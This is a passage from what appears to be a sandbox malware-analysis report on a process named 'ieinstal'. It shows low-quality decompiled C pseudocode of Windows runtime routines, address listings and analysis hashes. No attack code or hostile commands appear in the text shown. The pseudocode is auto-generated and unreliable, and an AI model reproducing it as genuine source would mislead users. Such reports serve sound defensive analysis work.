										L1EC777F0( *( *[fs:0x30] + 0x18), 0, _t78);
									}
									_t68 = _t122;
									goto L4;
								}
								_t110 = _v1056;
								_t118 =  *((intOrPtr*)(_t102 + 8));
								_v1060 = _t118;
								__eflags = _t110;
								if(_t110 == 0) {
									L10:
									_t122 = 0x80000005;
									L11:
									_t81 = _v1040;
									__eflags = _t81;
									if(_t81 == 0) {
										goto L15;
									}
									__eflags = _t122;
									if(_t122 >= 0) {
										L14:
										 *_t81 = _t118;
										goto L15;
									}
									__eflags = _t122 - 0x80000005;
									if(_t122 != 0x80000005) {
										goto L15;
									}
									goto L14;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
									goto L10;
								}
								_push( *((intOrPtr*)(_t102 + 8)));
								_t59 = _t102 + 0xc; // 0xc
								_push(_t110);
								L54:
								E1EC9F3E0();
								_t125 = _t125 + 0xc;
								goto L11;
							}
							__eflags = _t109 - 7;
							if(_t109 == 7) {
								goto L55;
							}
							_t118 = 4;
							__eflags = _t109 - _t118;
							if(_t109 != _t118) {
								__eflags = _t109 - 0xb;
								if(_t109 != 0xb) {
									__eflags = _t109 - 1;
									if(_t109 == 1) {
										__eflags = _t114 - _t118;
										if(_t114 != _t118) {
											_t118 =  *((intOrPtr*)(_t102 + 8));
											_v1060 = _t118;
											__eflags = _t118 - _t77;
											if(_t118 > _t77) {
												goto L10;
											}
											_push(_t118);
											_t56 = _t102 + 0xc; // 0xc
											_push(_v1056);
											goto L54;
										}
										__eflags = _t77 - _t118;
										if(_t77 != _t118) {
											L34:
											_t122 = 0xc0000004;
											goto L15;
										}
										_t111 = _v1056;
										__eflags = _t111 & 0x00000003;
										if((_t111 & 0x00000003) == 0) {
											_v1060 = _t118;
											__eflags = _t111;
											if(__eflags == 0) {
												goto L10;
											}
											_t42 = _t102 + 0xc; // 0xc
											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
											_v1048 =  *((intOrPtr*)(_t102 + 8));
											_push(_t111);
											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
											_push(0);
											_push( &_v1048);
											_t122 = E1EC913C0(_t102, _t118, _t122, __eflags);
											L44:
											_t118 = _v1072;
											goto L11;
										}
										_t122 = 0x80000002;
										goto L15;
									}
									_t122 = 0xc0000024;
									goto L44;
								}
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									goto L59;
								}
								_t118 = 8;
								__eflags = _t77 - _t118;
								if(_t77 != _t118) {
									goto L34;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
									goto L34;
								}
								_t112 = _v1056;
								_v1060 = _t118;
								__eflags = _t112;
								if(_t112 == 0) {
									goto L10;
								}
								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
								goto L11;
							}
							__eflags = _t114 - _t118;
							if(_t114 != _t118) {
								goto L59;
							}
							__eflags = _t77 - _t118;
							if(_t77 != _t118) {
								goto L34;
							}
							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
								goto L34;
							}
							_t113 = _v1056;
							_v1060 = _t118;
							__eflags = _t113;
							if(_t113 == 0) {
								goto L10;
							}
							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
							goto L11;
						}
						_t118 =  *((intOrPtr*)(_t102 + 8));
						__eflags = _t118 - _a20;
						if(_t118 <= _a20) {
							_t114 =  *(_t102 + 4);
							_t77 = _t118;
							goto L26;
						}
						_v1060 = _t118;
						goto L10;
					}
					__eflags = _t122 - 0x80000005;
					if(_t122 != 0x80000005) {
						goto L15;
					}
					L1EC777F0( *( *[fs:0x30] + 0x18), 0, _t102);
					L18:
					_t121 = _v1060;
					goto L19;
				}
				_push( &_v1060);
				_push(0x400);
				_t102 =  &_v1036;
				_push(_t102);
				_push(2);
				_push( &_v1048);
				_push(_t116);
				_t122 = E1EC99650();
				if(_t122 >= 0) {
					__eflags = 0;
					_v1052 = 0;
					goto L7;
				}
				if(_t122 == 0x80000005) {
					goto L18;
				}
				goto L4;
			}










































                                                            0x1ec5c608
                                                            0x1ec5c615
                                                            0x1ec5c625
                                                            0x1ec5c62d
                                                            0x1ec5c635
                                                            0x1ec5c640
                                                            0x1ec5c680
                                                            0x1ec5c687
                                                            0x1ec5c688
                                                            0x1ec5c689
                                                            0x1ec5c694
                                                            0x1ec5c694
                                                            0x1ec5c642
                                                            0x1ec5c64a
                                                            0x1ec5c697
                                                            0x1ecc7a25
                                                            0x1ecc7a2b
                                                            0x1ecc7a2e
                                                            0x1ecc7a30
                                                            0x1ecc7bea
                                                            0x1ecc7bea
                                                            0x00000000
                                                            0x1ecc7bea
                                                            0x1ecc7a36
                                                            0x1ecc7a43
                                                            0x1ecc7a48
                                                            0x1ecc7a4c
                                                            0x1ecc7a4e
                                                            0x00000000
                                                            0x00000000
                                                            0x1ecc7a58
                                                            0x1ecc7a5a
                                                            0x1ecc7a5b
                                                            0x1ecc7a5c
                                                            0x1ecc7a5d
                                                            0x1ecc7a63
                                                            0x1ecc7a64
                                                            0x1ecc7a6a
                                                            0x1ecc7a6c
                                                            0x1ecc7a6e
                                                            0x1ecc79cb
                                                            0x1ecc79cb
                                                            0x1ecc79ce
                                                            0x1ecc79d0
                                                            0x1ecc7a98
                                                            0x1ecc7a9b
                                                            0x1ecc7a9b
                                                            0x1ecc7a9e
                                                            0x1ecc7aa1
                                                            0x1ecc7bbe
                                                            0x1ecc7bbe
                                                            0x1ecc7bc0
                                                            0x1ecc7be0
                                                            0x1ecc7be0
                                                            0x1ecc7a01
                                                            0x1ecc7a01
                                                            0x1ecc7a05
                                                            0x1ecc7a07
                                                            0x1ecc7a15
                                                            0x1ecc7a15
                                                            0x1ecc7a1a
                                                            0x00000000
                                                            0x1ecc7a1a
                                                            0x1ecc7bc2
                                                            0x1ecc7bc6
                                                            0x1ecc7bc9
                                                            0x1ecc7bcd
                                                            0x1ecc7bcf
                                                            0x1ecc79e6
                                                            0x1ecc79e6
                                                            0x1ecc79eb
                                                            0x1ecc79eb
                                                            0x1ecc79ef
                                                            0x1ecc79f1
                                                            0x00000000
                                                            0x00000000
                                                            0x1ecc79f3
                                                            0x1ecc79f5
                                                            0x1ecc79ff
                                                            0x1ecc79ff
                                                            0x00000000
                                                            0x1ecc79ff
                                                            0x1ecc79f7
                                                            0x1ecc79fd
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x1ecc79fd
                                                            0x1ecc7bd5
                                                            0x1ecc7bd8
                                                            0x00000000
                                                            0x00000000
                                                            0x1ecc7ba9
                                                            0x1ecc7bac
                                                            0x1ecc7bb0
                                                            0x1ecc7bb1
                                                            0x1ecc7bb1
                                                            0x1ecc7bb6
                                                            0x00000000
                                                            0x1ecc7bb6
                                                            0x1ecc7aa7
                                                            0x1ecc7aaa
                                                            0x00000000
                                                            0x00000000
                                                            0x1ecc7ab2
                                                            0x1ecc7ab3
                                                            0x1ecc7ab5
                                                            0x1ecc7aec
                                                            0x1ecc7aef
                                                            0x1ecc7b25
                                                            0x1ecc7b28
                                                            0x1ecc7b62
                                                            0x1ecc7b64
                                                            0x1ecc7b8f
                                                            0x1ecc7b92
                                                            0x1ecc7b96
                                                            0x1ecc7b98
                                                            0x00000000
                                                            0x00000000
                                                            0x1ecc7b9e
                                                            0x1ecc7b9f
                                                            0x1ecc7ba3
                                                            0x00000000
                                                            0x1ecc7ba3
                                                            0x1ecc7b66
                                                            0x1ecc7b68
                                                            0x1ecc7ae2
                                                            0x1ecc7ae2
                                                            0x00000000
                                                            0x1ecc7ae2
                                                            0x1ecc7b6e
                                                            0x1ecc7b72
                                                            0x1ecc7b75
                                                            0x1ecc7b81
                                                            0x1ecc7b85
                                                            0x1ecc7b87
                                                            0x00000000
                                                            0x00000000
                                                            0x1ecc7b31
                                                            0x1ecc7b34
                                                            0x1ecc7b3c
                                                            0x1ecc7b45
                                                            0x1ecc7b46
                                                            0x1ecc7b4f
                                                            0x1ecc7b51
                                                            0x1ecc7b57
                                                            0x1ecc7b59
                                                            0x1ecc7b59
                                                            0x00000000
                                                            0x1ecc7b59
                                                            0x1ecc7b77
                                                            0x00000000
                                                            0x1ecc7b77
                                                            0x1ecc7b2a
                                                            0x00000000
                                                            0x1ecc7b2a
                                                            0x1ecc7af1
                                                            0x1ecc7af3
                                                            0x00000000
                                                            0x00000000
                                                            0x1ecc7afb
                                                            0x1ecc7afc
                                                            0x1ecc7afe
                                                            0x00000000
                                                            0x00000000
                                                            0x1ecc7b00
                                                            0x1ecc7b03
                                                            0x00000000
                                                            0x00000000
                                                            0x1ecc7b05
                                                            0x1ecc7b09
                                                            0x1ecc7b0d
                                                            0x1ecc7b0f
                                                            0x00000000
                                                            0x00000000
                                                            0x1ecc7b18
                                                            0x1ecc7b1d
                                                            0x00000000
                                                            0x1ecc7b1d
                                                            0x1ecc7ab7
                                                            0x1ecc7ab9
                                                            0x00000000
                                                            0x00000000
                                                            0x1ecc7abf
                                                            0x1ecc7ac1
                                                            0x00000000
                                                            0x00000000
                                                            0x1ecc7ac3
                                                            0x1ecc7ac6
                                                            0x00000000
                                                            0x00000000
                                                            0x1ecc7ac8
                                                            0x1ecc7acc
                                                            0x1ecc7ad0
                                                            0x1ecc7ad2
                                                            0x00000000
                                                            0x00000000
                                                            0x1ecc7adb
                                                            0x00000000
                                                            0x1ecc7adb
                                                            0x1ecc79d6
                                                            0x1ecc79d9
                                                            0x1ecc79dc
                                                            0x1ecc7a91
                                                            0x1ecc7a94
                                                            0x00000000
                                                            0x1ecc7a94
                                                            0x1ecc79e2
                                                            0x00000000
                                                            0x1ecc79e2
                                                            0x1ecc7a74
                                                            0x1ecc7a7a
                                                            0x00000000
                                                            0x00000000
                                                            0x1ecc7a8a
                                                            0x1ecc7a21
                                                            0x1ecc7a21
                                                            0x00000000
                                                            0x1ecc7a21
                                                            0x1ec5c650
                                                            0x1ec5c651
                                                            0x1ec5c656
                                                            0x1ec5c65c
                                                            0x1ec5c65d
                                                            0x1ec5c663
                                                            0x1ec5c664
                                                            0x1ec5c66a
                                                            0x1ec5c66e
                                                            0x1ecc79c5
                                                            0x1ecc79c7
                                                            0x00000000
                                                            0x1ecc79c7
                                                            0x1ec5c67a
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000

                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 02a44fd31e2ecda18d44744310efb7d97d94405e18e858e8974e19daf6a28fb3
                                                            • Instruction ID: 9463cd806770520d5d6e3a712778049076c5c31eb2bb08ee367b9847f7f1a5c2
                                                            • Opcode Fuzzy Hash: 02a44fd31e2ecda18d44744310efb7d97d94405e18e858e8974e19daf6a28fb3
                                                            • Instruction Fuzzy Hash: C181AF766142429BCB15CF25CC90E6BB3EAFF84390F155A2AFD459B248D730ED41CBA2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1ECEB8D0 Relevance: .2, Instructions: 199COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 39%
                                                            			E1ECEB8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				char _v8;
				signed int _v12;
				signed int _t80;
				signed int _t83;
				intOrPtr _t89;
				signed int _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t109 =  *0x1ed47b9c; // 0x0
				_t124 = L1EC74620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E1EC99800();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
									_push(5);
									_push(0xfffffffe);
									E1EC995B0();
									if( *_t107 != 0) {
										_push( *_t107);
										E1EC995D0();
									}
								}
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								L37:
								L1EC777F0();
								return _t122;
							}
							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_t112 = 0x400;
								_push( &_v8);
								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E1EC99910();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													L1EC777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
											}
											_push( *_t124);
											E1EC995D0();
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
									_t89 =  *0x1ed47b9c; // 0x0
									_t92 = L1EC74620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_t112 =  &_v8;
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E1EC99910();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									L1EC777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t114 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = E1EC5A7B0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t115 = 0x28;
						_t122 = E1ECEE7D3(_t115, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t117 = 4;
					_t122 = E1ECEE7D3(_t117, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						E1EC995B0();
						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}




















                                                            0x1eceb8d9
                                                            0x1eceb8e4
                                                            0x00000000
                                                            0x1eceb8e6
                                                            0x1eceb8f3
                                                            0x1eceb8f5
                                                            0x1eceb8f5
                                                            0x1eceb8f8
                                                            0x1eceb920
                                                            0x1eceb924
                                                            0x1eceb936
                                                            0x1eceb939
                                                            0x1eceb93d
                                                            0x1eceb948
                                                            0x1eceb9a0
                                                            0x1eceb9a0
                                                            0x1eceb9a4
                                                            0x1eceb9bf
                                                            0x1eceb9c4
                                                            0x1eceb9c6
                                                            0x1eceb9cd
                                                            0x1eceb9d1
                                                            0x1ecebad4
                                                            0x1ecebad8
                                                            0x1ecebada
                                                            0x1ecebadc
                                                            0x1ecebadc
                                                            0x1ecebadf
                                                            0x1ecebae0
                                                            0x1ecebae2
                                                            0x1ecebae4
                                                            0x1ecebaec
                                                            0x1ecebaee
                                                            0x1ecebaf0
                                                            0x1ecebaf0
                                                            0x1ecebaec
                                                            0x1ecebafb
                                                            0x1ecebafc
                                                            0x1ecebafe
                                                            0x1ecebb01
                                                            0x1ecebb01
                                                            0x00000000
                                                            0x1ecebb06
                                                            0x1eceb9d7
                                                            0x1eceb9db
                                                            0x1eceb9db
                                                            0x1eceb9de
                                                            0x1eceb9de
                                                            0x1eceb9e4
                                                            0x1eceb9e7
                                                            0x1eceb9ea
                                                            0x1eceb9ec
                                                            0x1eceb9ef
                                                            0x1eceb9f3
                                                            0x1eceba1b
                                                            0x1eceba1b
                                                            0x1eceba23
                                                            0x1eceba24
                                                            0x1eceba27
                                                            0x1eceba2a
                                                            0x1eceba2b
                                                            0x1eceba2e
                                                            0x1eceba30
                                                            0x1eceba37
                                                            0x1eceba3f
                                                            0x1eceba9c
                                                            0x1ecebaa2
                                                            0x1ecebb13
                                                            0x1ecebb15
                                                            0x1ecebaae
                                                            0x1ecebaae
                                                            0x1ecebab3
                                                            0x1ecebab5
                                                            0x1ecebaba
                                                            0x1ecebac8
                                                            0x1ecebac8
                                                            0x1ecebaba
                                                            0x1ecebacd
                                                            0x1ecebacf
                                                            0x00000000
                                                            0x1ecebacf
                                                            0x1ecebb1a
                                                            0x00000000
                                                            0x1ecebb1c
                                                            0x1ecebaa7
                                                            0x1ecebb11
                                                            0x00000000
                                                            0x1ecebb11
                                                            0x1ecebaa9
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x1eceba41
                                                            0x1eceba41
                                                            0x1eceba41
                                                            0x1eceba58
                                                            0x1eceba5d
                                                            0x1eceba62
                                                            0x00000000
                                                            0x00000000
                                                            0x1eceba64
                                                            0x1eceba67
                                                            0x1eceba68
                                                            0x1eceba69
                                                            0x1eceba6c
                                                            0x1eceba6f
                                                            0x1eceba71
                                                            0x1eceba78
                                                            0x1eceba80
                                                            0x00000000
                                                            0x00000000
                                                            0x1eceba90
                                                            0x1eceba90
                                                            0x1eceba97
                                                            0x00000000
                                                            0x1eceba97
                                                            0x1eceb9f5
                                                            0x1eceb9f7
                                                            0x1eceb9f7
                                                            0x1eceb9fa
                                                            0x1eceba03
                                                            0x1eceba07
                                                            0x1eceba0c
                                                            0x1eceba10
                                                            0x1eceba17
                                                            0x00000000
                                                            0x1eceb9f7
                                                            0x1eceb9a6
                                                            0x1eceb9a8
                                                            0x1eceb9af
                                                            0x1eceb9b3
                                                            0x00000000
                                                            0x00000000
                                                            0x1eceb9b9
                                                            0x00000000
                                                            0x1eceb9b9
                                                            0x1eceb94d
                                                            0x1eceb98f
                                                            0x1eceb995
                                                            0x1eceb999
                                                            0x1eceb960
                                                            0x1eceb967
                                                            0x1eceb968
                                                            0x1eceb96a
                                                            0x00000000
                                                            0x1eceb96a
                                                            0x1eceb99b
                                                            0x1eceb99e
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x1eceb99e
                                                            0x1eceb951
                                                            0x1eceb954
                                                            0x1eceb95a
                                                            0x1eceb95e
                                                            0x1eceb972
                                                            0x1eceb979
                                                            0x1eceb97d
                                                            0x1eceb97f
                                                            0x1eceb980
                                                            0x1eceb982
                                                            0x1eceb984
                                                            0x00000000
                                                            0x1eceb984
                                                            0x00000000
                                                            0x1eceb926
                                                            0x00000000
                                                            0x1eceb926

                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 28e6549a537a2747a595189da445c87120f3fc8201e7a4abea7e1c51a8beece5
                                                            • Instruction ID: 7d647f07d70eb32a3ebaee28b69b3cc7ac2041dcd4b67bb9dce45c5ac0194d03
                                                            • Opcode Fuzzy Hash: 28e6549a537a2747a595189da445c87120f3fc8201e7a4abea7e1c51a8beece5
                                                            • Instruction Fuzzy Hash: F3710E36200742EFDB328F15CC45F66BBB6EF44720F114B28E6569BAA4DB74E941CB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1ECD6DC9 Relevance: .2, Instructions: 199COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 79%
                                                            			E1ECD6DC9(signed int __ecx, void* __edx) {
				unsigned int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				void* _t87;
				void* _t95;
				signed char* _t96;
				signed int _t107;
				signed int _t136;
				signed char* _t137;
				void* _t157;
				void* _t161;
				void* _t167;
				intOrPtr _t168;
				void* _t174;
				void* _t175;
				signed int _t176;
				void* _t177;

				_t136 = __ecx;
				_v44 = 0;
				_t167 = __edx;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v60 = 0;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v16 = __ecx;
				_t87 = L1EC74620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
				_t175 = _t87;
				if(_t175 != 0) {
					_t11 = _t175 + 0x30; // 0x30
					 *((short*)(_t175 + 6)) = 0x14d4;
					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
					E1ECD6B4C(_t167, _t11, 0x214,  &_v8);
					_v12 = _v8 + 0x10;
					_t95 = E1EC77D50();
					_t137 = 0x7ffe0384;
					if(_t95 == 0) {
						_t96 = 0x7ffe0384;
					} else {
						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t175);
					_push(_v12);
					_push(0x402);
					_push( *_t96 & 0x000000ff);
					E1EC99AE0();
					_t87 = L1EC777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
					_t176 = _v16;
					if((_t176 & 0x00000100) != 0) {
						_push( &_v36);
						_t157 = 4;
						_t87 = E1ECD795D( *((intOrPtr*)(_t167 + 8)), _t157);
						if(_t87 >= 0) {
							_v24 = E1ECD795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
							_v28 = E1ECD795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
							_push( &_v52);
							_t161 = 5;
							_t168 = E1ECD795D( *((intOrPtr*)(_t167 + 8)), _t161);
							_v20 = _t168;
							_t107 = L1EC74620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
							_v16 = _t107;
							if(_t107 != 0) {
								_v8 = _v8 & 0x00000000;
								 *(_t107 + 0x20) = _t176;
								 *((short*)(_t107 + 6)) = 0x14d5;
								_t47 = _t107 + 0x24; // 0x24
								_t177 = _t47;
								E1ECD6B4C( &_v36, _t177, 0xc78,  &_v8);
								_t51 = _v8 + 4; // 0x4
								_t178 = _t177 + (_v8 >> 1) * 2;
								_v12 = _t51;
								E1ECD6B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_v12 = _v12 + _v8;
								E1ECD6B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_t125 = _v8;
								_v12 = _v12 + _v8;
								E1ECD6B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
								_t174 = _v12 + _v8;
								if(E1EC77D50() != 0) {
									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
								}
								_push(_v16);
								_push(_t174);
								_push(0x402);
								_push( *_t137 & 0x000000ff);
								E1EC99AE0();
								L1EC777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
								_t168 = _v20;
							}
							_t87 = L1EC72400( &_v36);
							if(_v24 >= 0) {
								_t87 = L1EC72400( &_v44);
							}
							if(_t168 >= 0) {
								_t87 = L1EC72400( &_v52);
							}
							if(_v28 >= 0) {
								return L1EC72400( &_v60);
							}
						}
					}
				}
				return _t87;
			}































                                                            0x1ecd6dd4
                                                            0x1ecd6dde
                                                            0x1ecd6de1
                                                            0x1ecd6de3
                                                            0x1ecd6de6
                                                            0x1ecd6de9
                                                            0x1ecd6dec
                                                            0x1ecd6def
                                                            0x1ecd6df2
                                                            0x1ecd6df5
                                                            0x1ecd6dfe
                                                            0x1ecd6e04
                                                            0x1ecd6e09
                                                            0x1ecd6e0d
                                                            0x1ecd6e18
                                                            0x1ecd6e1b
                                                            0x1ecd6e22
                                                            0x1ecd6e2d
                                                            0x1ecd6e30
                                                            0x1ecd6e36
                                                            0x1ecd6e42
                                                            0x1ecd6e4d
                                                            0x1ecd6e50
                                                            0x1ecd6e55
                                                            0x1ecd6e5c
                                                            0x1ecd6e6e
                                                            0x1ecd6e5e
                                                            0x1ecd6e67
                                                            0x1ecd6e67
                                                            0x1ecd6e73
                                                            0x1ecd6e74
                                                            0x1ecd6e77
                                                            0x1ecd6e7c
                                                            0x1ecd6e7d
                                                            0x1ecd6e8e
                                                            0x1ecd6e93
                                                            0x1ecd6e9c
                                                            0x1ecd6ea8
                                                            0x1ecd6eab
                                                            0x1ecd6eac
                                                            0x1ecd6eb3
                                                            0x1ecd6ecd
                                                            0x1ecd6edc
                                                            0x1ecd6ee2
                                                            0x1ecd6ee5
                                                            0x1ecd6ef2
                                                            0x1ecd6efb
                                                            0x1ecd6f01
                                                            0x1ecd6f06
                                                            0x1ecd6f0b
                                                            0x1ecd6f11
                                                            0x1ecd6f1a
                                                            0x1ecd6f22
                                                            0x1ecd6f26
                                                            0x1ecd6f26
                                                            0x1ecd6f33
                                                            0x1ecd6f41
                                                            0x1ecd6f44
                                                            0x1ecd6f47
                                                            0x1ecd6f54
                                                            0x1ecd6f65
                                                            0x1ecd6f77
                                                            0x1ecd6f7c
                                                            0x1ecd6f82
                                                            0x1ecd6f91
                                                            0x1ecd6f99
                                                            0x1ecd6fa3
                                                            0x1ecd6fae
                                                            0x1ecd6fae
                                                            0x1ecd6fba
                                                            0x1ecd6fbb
                                                            0x1ecd6fbc
                                                            0x1ecd6fc1
                                                            0x1ecd6fc2
                                                            0x1ecd6fd3
                                                            0x1ecd6fd8
                                                            0x1ecd6fd8
                                                            0x1ecd6fdf
                                                            0x1ecd6fe8
                                                            0x1ecd6fee
                                                            0x1ecd6fee
                                                            0x1ecd6ff5
                                                            0x1ecd6ffb
                                                            0x1ecd6ffb
                                                            0x1ecd7004
                                                            0x00000000
                                                            0x1ecd700a
                                                            0x1ecd7004
                                                            0x1ecd6eb3
                                                            0x1ecd6e9c
                                                            0x1ecd7015

                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                            • Instruction ID: 941a4913a97e9aef18af762994e3258edec10cccbd2133b387ca78e6e9577439
                                                            • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                            • Instruction Fuzzy Hash: 90717A75E00249EFCB10CFA4CD84AEEBBB9FF48700F104669E605A7290DB31BA45CB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

